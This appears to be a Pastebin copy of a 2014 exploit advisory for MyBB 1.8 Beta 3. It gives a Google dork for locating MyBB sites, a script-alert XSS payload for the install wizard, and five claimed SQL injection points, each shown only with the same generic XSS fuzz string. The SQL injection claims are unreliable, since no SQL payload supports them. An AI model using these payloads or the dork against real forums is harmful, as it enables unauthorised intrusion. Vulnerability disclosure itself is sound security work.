Advertisement
Guest User

Corps714

a guest
Oct 25th, 2014
148
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.92 KB | None | 0 0
  1. # Title: MyBB 1.8 Beta 3 - Cross Site Scripting & SQL Injection
  2. # Google Dork: intext:"Powered By MyBB"
  3. # Date: 15.08.2014
  4. # Author: DemoLisH
  5. # Vendor Homepage: http://www.mybb.com/
  6. # Software Link: http://www.mybb.com/downloads
  7. # Version: 1.8 - Beta 3
  8. # Contact: onur@b3yaz.org
  9. ***************************************************
  10. a) Cross Site Scripting in Installation Wizard ( Board Configuration )
  11. Fill -Forum Name, Website Name, Website URL- with your code, for example - "><script>alert('DemoLisH')</script>localhost/install/index.php
  12. Now let's finish setup and go to the homepage.
  13.  
  14.  
  15. b) SQL Injection in Private Messages ( User CP )
  16. Go to -> Inbox, for example:localhost/private.php
  17. Search at the following code Keywords:<foo> <h1> <script> alert (bar) () ; // ' " > < prompt \x41 %42 constructor onload
  18.  
  19.  
  20. c) SQL Injection in Showthread
  21. Go to -> Show Thread, for example:localhost/showthread.php?tid=1
  22. Search at the following code Keywords:<foo> <h1> <script> alert (bar) () ; // ' " > < prompt \x41 %42 constructor onload
  23.  
  24.  
  25. d) SQL Injection in Search
  26. Go to -> Search, for example:localhost/search.php
  27. Search at the following code Keywords:<foo> <h1> <script> alert (bar) () ; // ' " > < prompt \x41 %42 constructor onload
  28.  
  29.  
  30. e) SQL Injection in Help Documents
  31. Go to -> Help Documents, for example:localhost/misc.php?action=help
  32. Search at the following code Keywords:<foo> <h1> <script> alert (bar) () ; // ' " > < prompt \x41 %42 constructor onload
  33.  
  34.  
  35. f) SQL Injection in Forum Display
  36. Go to -> Forum Display, for example:localhost/forumdisplay.php?fid=2
  37. Search at the following code "Search this Forum":<foo> <h1> <script> alert (bar) () ; // ' " > < prompt \x41 %42 constructor onload
  38.  
  39. ***************************************************
  40. [~#~] Thanks To:Mugair, X-X-X, PoseidonKairos, DexmoD, Micky and all TurkeySecurity Members.
  41.  
  42. # C5385FB67D35D5E0 1337day.com [2014-10-25] C072C10B3BF9C4C7 #
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement